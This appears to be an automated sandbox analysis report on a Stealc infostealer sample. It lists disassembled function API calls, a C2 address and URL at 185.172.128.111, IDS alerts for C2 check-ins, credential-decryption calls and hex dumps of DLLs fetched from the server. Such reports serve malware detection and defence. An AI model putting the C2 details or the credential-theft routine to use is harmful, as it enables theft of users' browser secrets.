Part of subcall function 6CE01110: PR_GetEnvSecure.NSS3(NSPR_LOG_MODULES,?,?,?,?,?,?,?,?,?,?,?,?,?,6CE00936,00000001), ref: 6CE01167

Strings

clock, xrefs: 6CE00F20

Memory Dump Source

Source File: 00000000.00000002.2196255121.000000006CD91000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CD90000, based on PE: true

Associated: 00000000.00000002.2196235523.000000006CD90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196384856.000000006CF2F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196419148.000000006CF6E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196447580.000000006CF6F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196467060.000000006CF70000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196485729.000000006CF75000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cd90000_q27UFusYdn.jbxd

Similarity

API ID: InfoModulePageSecureSizeSystemcallocstrdup
String ID: clock
API String ID: 536403800-3195780754
Opcode ID: 974f77f77ba9151158661b9963217e9469acbccc4125580496445587b686d7ca
Instruction ID: e91b3bd7e047acb3ff231cd01eed8c3d3ecd6d203866f8ae7f9b0cd0213d2d44
Opcode Fuzzy Hash: 974f77f77ba9151158661b9963217e9469acbccc4125580496445587b686d7ca
Instruction Fuzzy Hash: 6AD02232B00254A1C11223D7AC48B96BABCC7C327DF20482AF00806E000A2A44FEC2F5

Uniqueness

Uniqueness Score: -1.00%

Function 6CE70DB0 Relevance: 5.1, APIs: 4, Instructions: 97COMMON

Download Yara Rule

APIs

calloc.MOZGLUE ref: 6CE70DF5
TlsGetValue.KERNEL32 ref: 6CE70E2D
TlsGetValue.KERNEL32 ref: 6CE70E58
TlsGetValue.KERNEL32 ref: 6CE70E84

Memory Dump Source

Source File: 00000000.00000002.2196255121.000000006CD91000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CD90000, based on PE: true

Associated: 00000000.00000002.2196235523.000000006CD90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196384856.000000006CF2F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196419148.000000006CF6E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196447580.000000006CF6F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196467060.000000006CF70000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196485729.000000006CF75000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cd90000_q27UFusYdn.jbxd

Similarity

API ID: Value$calloc
String ID:
API String ID: 3339632435-0
Opcode ID: 38d62911ba83f5460ed8aa0f4da03406bc487fedd41b720b2004575393f5b36e
Instruction ID: ee63a5d3c863f42d4336dad098ca58b410bff0f98052664fbd481569fa046f2b
Opcode Fuzzy Hash: 38d62911ba83f5460ed8aa0f4da03406bc487fedd41b720b2004575393f5b36e
Instruction Fuzzy Hash: 7B31C5B0A643908BDF60AF78C44436977B4FF0630CF21462DD89887B11DB368096CBA2

Uniqueness

Uniqueness Score: -1.00%

Function 6CDCA4E0 Relevance: 5.1, APIs: 4, Instructions: 75stringCOMMON

Download Yara Rule

APIs

strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,6CDCA468,00000000), ref: 6CDCA4F9
strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,6CDCA468,00000000), ref: 6CDCA51B
strlen.API-MS-WIN-CRT-STRING-L1-1-0(6CDCA468,?,6CDCA468,00000000), ref: 6CDCA545
memcpy.VCRUNTIME140(00000001,6CDCA468,00000001,?,?,?,6CDCA468,00000000), ref: 6CDCA57D

Memory Dump Source

Source File: 00000000.00000002.2196255121.000000006CD91000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CD90000, based on PE: true

Associated: 00000000.00000002.2196235523.000000006CD90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196384856.000000006CF2F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196419148.000000006CF6E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196447580.000000006CF6F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196467060.000000006CF70000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196485729.000000006CF75000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cd90000_q27UFusYdn.jbxd

Similarity

API ID: strlen$memcpy
String ID:
API String ID: 3396830738-0
Opcode ID: 600eb8a033a5ca9a43437b08be08586c367961074f3215d643a34829541b8b4a
Instruction ID: 7d1b00d1db3d5f03972c0186b1f8b302d07272726406f2883431e1381c9aa30b
Opcode Fuzzy Hash: 600eb8a033a5ca9a43437b08be08586c367961074f3215d643a34829541b8b4a
Instruction Fuzzy Hash: 53110AF3E1031597DB008AF9DC816DB77AD9F55268F284234ED68877D0F639990983E2

Uniqueness

Uniqueness Score: -1.00%

Function 6CE70F10 Relevance: 5.1, APIs: 4, Instructions: 52stringCOMMON

Download Yara Rule

APIs

strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,00000000,?,?,6CE12AF5,?,?,?,?,?,6CE10A1B,00000000), ref: 6CE70F1A
malloc.MOZGLUE(00000001), ref: 6CE70F30
memcpy.VCRUNTIME140(00000000,?,00000001), ref: 6CE70F42
TlsGetValue.KERNEL32 ref: 6CE70F5B

Memory Dump Source

Source File: 00000000.00000002.2196255121.000000006CD91000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CD90000, based on PE: true

Associated: 00000000.00000002.2196235523.000000006CD90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196384856.000000006CF2F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196419148.000000006CF6E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196447580.000000006CF6F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196467060.000000006CF70000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196485729.000000006CF75000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cd90000_q27UFusYdn.jbxd

Similarity

API ID: Valuemallocmemcpystrlen
String ID:
API String ID: 2332725481-0
Opcode ID: 89242cfc04e343dee7ceec908f75187ed512bbd10cb06f1b78c1aeebca45188b
Instruction ID: 3c5dc38c01d780d39546f5346de487842b6185e6eced5601a97c8a0150bede7f
Opcode Fuzzy Hash: 89242cfc04e343dee7ceec908f75187ed512bbd10cb06f1b78c1aeebca45188b
Instruction Fuzzy Hash: 590128B1E202905BEB602B3A9D056627ABCEF4325DF210125EC5CC2A21E732C416C6F2

Uniqueness

Uniqueness Score: -1.00%

Source: http://185.172.128.111/f	Virustotal: Detection: 5%	Perma Link
Source: http://185.172.128.111/f993692117a3fda2.	Virustotal: Detection: 5%	Perma Link
Source: http://185.172.128.111	Virustotal: Detection: 6%	Perma Link
Source: http://185.172.128.111/f993692117a3fda2.php	Virustotal: Detection: 11%	Perma Link

Source: C:\Users\user\Desktop\q27UFusYdn.exe	Code function: 0_2_00409540 CryptUnprotectData,LocalAlloc,LocalFree,	0_2_00409540
Source: C:\Users\user\Desktop\q27UFusYdn.exe	Code function: 0_2_004155A0 CryptBinaryToStringA,GetProcessHeap,RtlAllocateHeap,CryptBinaryToStringA,	0_2_004155A0
Source: C:\Users\user\Desktop\q27UFusYdn.exe	Code function: 0_2_00406C10 GetProcessHeap,HeapAlloc,CryptUnprotectData,WideCharToMultiByte,LocalFree,	0_2_00406C10
Source: C:\Users\user\Desktop\q27UFusYdn.exe	Code function: 0_2_004094A0 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,	0_2_004094A0
Source: C:\Users\user\Desktop\q27UFusYdn.exe	Code function: 0_2_0040BF90 memset,lstrlen,CryptStringToBinaryA,PK11_GetInternalKeySlot,PK11_Authenticate,PK11SDR_Decrypt,memcpy,lstrcat,lstrcat,PK11_FreeSlot,lstrcat,	0_2_0040BF90
Source: C:\Users\user\Desktop\q27UFusYdn.exe	Code function: 0_2_6CD06C80 CryptQueryObject,CryptMsgGetParam,moz_xmalloc,memset,CryptMsgGetParam,CertFindCertificateInStore,free,CertGetNameStringW,moz_xmalloc,memset,CertGetNameStringW,CertFreeCertificateContext,CryptMsgClose,CertCloseStore,CreateFileW,moz_xmalloc,memset,memset,CryptQueryObject,free,CloseHandle,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,memset,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerifyVersionInfoW,moz_xmalloc,memset,GetLastError,moz_xmalloc,memset,CryptBinaryToStringW,_wcsupr_s,free,GetLastError,memset,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerifyVersionInfoW,__Init_thread_footer,__Init_thread_footer,	0_2_6CD06C80
Source: C:\Users\user\Desktop\q27UFusYdn.exe	Code function: 0_2_6CE5A9A0 PK11SDR_Decrypt,PORT_NewArena_Util,SEC_QuickDERDecodeItem_Util,PORT_FreeArena_Util,SECITEM_ZfreeItem_Util,PK11_GetInternalKeySlot,PK11_Authenticate,PORT_FreeArena_Util,PK11_ListFixedKeysInSlot,SECITEM_ZfreeItem_Util,PK11_FreeSymKey,PK11_FreeSymKey,PORT_FreeArena_Util,PK11_FreeSymKey,SECITEM_ZfreeItem_Util,	0_2_6CE5A9A0
Source: C:\Users\user\Desktop\q27UFusYdn.exe	Code function: 0_2_6CE544C0 PK11_PubEncrypt,	0_2_6CE544C0
Source: C:\Users\user\Desktop\q27UFusYdn.exe	Code function: 0_2_6CE54440 PK11_PrivDecrypt,	0_2_6CE54440
Source: C:\Users\user\Desktop\q27UFusYdn.exe	Code function: 0_2_6CE24420 SECKEY_DestroyEncryptedPrivateKeyInfo,memset,PORT_FreeArena_Util,SECITEM_ZfreeItem_Util,SECITEM_ZfreeItem_Util,SECITEM_ZfreeItem_Util,free,	0_2_6CE24420

Source: Traffic	Snort IDS: 2044243 ET TROJAN [SEKOIA.IO] Win32/Stealc C2 Check-in 192.168.2.4:49730 -> 185.172.128.111:80
Source: Traffic	Snort IDS: 2044244 ET TROJAN Win32/Stealc Requesting browsers Config from C2 192.168.2.4:49730 -> 185.172.128.111:80
Source: Traffic	Snort IDS: 2051828 ET TROJAN Win32/Stealc Active C2 Responding with browsers Config M1 185.172.128.111:80 -> 192.168.2.4:49730
Source: Traffic	Snort IDS: 2044246 ET TROJAN Win32/Stealc Requesting plugins Config from C2 192.168.2.4:49730 -> 185.172.128.111:80
Source: Traffic	Snort IDS: 2051831 ET TROJAN Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config M1 185.172.128.111:80 -> 192.168.2.4:49730

Source: Malware configuration extractor	URLs: http://185.172.128.111/f993692117a3fda2.php
Source: Malware configuration extractor	URLs: http://185.172.128.111/f993692117a3fda2.php

Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Tue, 23 Apr 2024 07:26:57 GMTContent-Type: application/x-msdos-programContent-Length: 1106998Connection: keep-aliveLast-Modified: Mon, 05 Sep 2022 11:30:30 GMTETag: "10e436-5e7ec6832a180"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 12 00 d7 dd 15 63 00 92 0e 00 bf 13 00 00 e0 00 06 21 0b 01 02 19 00 26 0b 00 00 16 0d 00 00 0a 00 00 00 14 00 00 00 10 00 00 00 40 0b 00 00 00 e0 61 00 10 00 00 00 02 00 00 04 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00 00 30 0f 00 00 06 00 00 1c 3a 11 00 03 00 00 00 00 00 20 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 d0 0c 00 88 2a 00 00 00 00 0d 00 d0 0c 00 00 00 30 0d 00 a8 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 0d 00 18 3c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 20 0d 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0c 02 0d 00 d0 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 84 25 0b 00 00 10 00 00 00 26 0b 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 00 50 60 2e 64 61 74 61 00 00 00 7c 27 00 00 00 40 0b 00 00 28 00 00 00 2c 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 c0 2e 72 64 61 74 61 00 00 70 44 01 00 00 70 0b 00 00 46 01 00 00 54 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 40 2e 62 73 73 00 00 00 00 28 08 00 00 00 c0 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 60 c0 2e 65 64 61 74 61 00 00 88 2a 00 00 00 d0 0c 00 00 2c 00 00 00 9a 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 40 2e 69 64 61 74 61 00 00 d0 0c 00 00 00 00 0d 00 00 0e 00 00 00 c6 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 43 52 54 00 00 00 00 2c 00 00 00 00 10 0d 00 00 02 00 00 00 d4 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 74 6c 73 00 00 00 00 20 00 00 00 00 20 0d 00 00 02 00 00 00 d6 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 73 72 63 00 00 00 a8 04 00 00 00 30 0d 00 00 06 00 00 00 d8 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 65 6c 6f 63 00 00 18 3c 00 00 00 40 0d 00 00 3e 00 00 00 de 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 42 2f 34 00 00 00 00 00 00 38 05 00 00 00 80 0d 00 00 06 00 00 00 1c 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 40 42 2f 31 39 00 00 00 00 00 52 c8 00 00 00 90 0d 00 00 ca 00 00 00 22 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 33 31 00 00 00 00 00 5d 27 00 00 00 60 0e 00 00 28 00 00 00 ec 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 34 35 00 00 00 00 00 9a
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Tue, 23 Apr 2024 07:27:02 GMTContent-Type: application/x-msdos-programContent-Length: 685392Connection: keep-aliveLast-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "a7550-5e7e950876500"Accept-Ranges: bytesData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 0e 08 00 00 34 02 00 00 00 00 00 70 12 08 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 d0 0a 00 00 04 00 00 cb fd 0a 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 48 1c 0a 00 53 00 00 00 9b 1c 0a 00 c8 00 00 00 00 90 0a 00 78 03 00 00 00 00 00 00 00 00 00 00 00 46 0a 00 50 2f 00 00 00 a0 0a 00 f0 23 00 00 94 16 0a 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 20 08 00 a0 00 00 00 00 00 00 00 00 00 00 00 a4 1e 0a 00 40 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 95 0c 08 00 00 10 00 00 00 0e 08 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 c4 06 02 00 00 20 08 00 00 08 02 00 00 12 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 3c 46 00 00 00 30 0a 00 00 02 00 00 00 1a 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 80 0a 00 00 02 00 00 00 1c 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 78 03 00 00 00 90 0a 00 00 04 00 00 00 1e 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 f0 23 00 00 00 a0 0a 00 00 24 00 00 00 22 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Tue, 23 Apr 2024 07:27:04 GMTContent-Type: application/x-msdos-programContent-Length: 608080Connection: keep-aliveLast-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "94750-5e7e950876500"Accept-Ranges: bytesData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 07 00 a4 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 b6 07 00 00 5e 01 00 00 00 00 00 c0 b9 03 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 80 09 00 00 04 00 00 6a aa 09 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 01 60 08 00 e3 57 00 00 e4 b7 08 00 2c 01 00 00 00 20 09 00 b0 08 00 00 00 00 00 00 00 00 00 00 00 18 09 00 50 2f 00 00 00 30 09 00 d8 41 00 00 14 53 08 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 bc f8 07 00 18 00 00 00 68 d0 07 00 a0 00 00 00 00 00 00 00 00 00 00 00 ec bc 08 00 dc 03 00 00 e4 5a 08 00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 61 b5 07 00 00 10 00 00 00 b6 07 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 94 09 01 00 00 d0 07 00 00 0a 01 00 00 ba 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 44 1d 00 00 00 e0 08 00 00 04 00 00 00 c4 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 00 09 00 00 02 00 00 00 c8 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 74 6c 73 00 00 00 00 15 00 00 00 00 10 09 00 00 02 00 00 00 ca 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 b0 08 00 00 00 20 09 00 00 0a 00 00 00 cc 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 d8 41 00 00 00 30 09 00 00 42 00 00 00 d6 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Tue, 23 Apr 2024 07:27:05 GMTContent-Type: application/x-msdos-programContent-Length: 450024Connection: keep-aliveLast-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "6dde8-5e7e950876500"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 d9 93 31 43 9d f2 5f 10 9d f2 5f 10 9d f2 5f 10 29 6e b0 10 9f f2 5f 10 94 8a cc 10 8b f2 5f 10 9d f2 5e 10 22 f2 5f 10 cf 9a 5e 11 9e f2 5f 10 cf 9a 5c 11 95 f2 5f 10 cf 9a 5b 11 d3 f2 5f 10 cf 9a 5a 11 d1 f2 5f 10 cf 9a 5f 11 9c f2 5f 10 cf 9a a0 10 9c f2 5f 10 cf 9a 5d 11 9c f2 5f 10 52 69 63 68 9d f2 5f 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 82 ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 28 06 00 00 82 00 00 00 00 00 00 60 d9 03 00 00 10 00 00 00 40 06 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 f0 06 00 00 04 00 00 2c e0 06 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 10 67 04 00 82 cf 01 00 e8 72 06 00 18 01 00 00 00 a0 06 00 f0 03 00 00 00 00 00 00 00 00 00 00 00 9c 06 00 e8 41 00 00 00 b0 06 00 ac 3d 00 00 60 78 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 77 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 70 06 00 e4 02 00 00 c0 63 04 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 92 26 06 00 00 10 00 00 00 28 06 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 48 29 00 00 00 40 06 00 00 18 00 00 00 2c 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 ac 13 00 00 00 70 06 00 00 14 00 00 00 44 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 69 64 61 74 00 00 34 00 00 00 00 90 06 00 00 02 00 00 00 58 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 f0 03 00 00 00 a0 06 00 00 04 00 00 00 5a 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 ac 3d 00 00 00 b0 06 00 00 3e 00 00 00 5e 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Tue, 23 Apr 2024 07:27:06 GMTContent-Type: application/x-msdos-programContent-Length: 2046288Connection: keep-aliveLast-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "1f3950-5e7e950876500"Accept-Ranges: bytesData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 d0 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 d8 19 00 00 2e 05 00 00 00 00 00 60 a3 14 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 70 1f 00 00 04 00 00 6c 2d 20 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e4 26 1d 00 fa 9d 00 00 de c4 1d 00 40 01 00 00 00 50 1e 00 78 03 00 00 00 00 00 00 00 00 00 00 00 0a 1f 00 50 2f 00 00 00 60 1e 00 5c 08 01 00 b0 01 1d 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 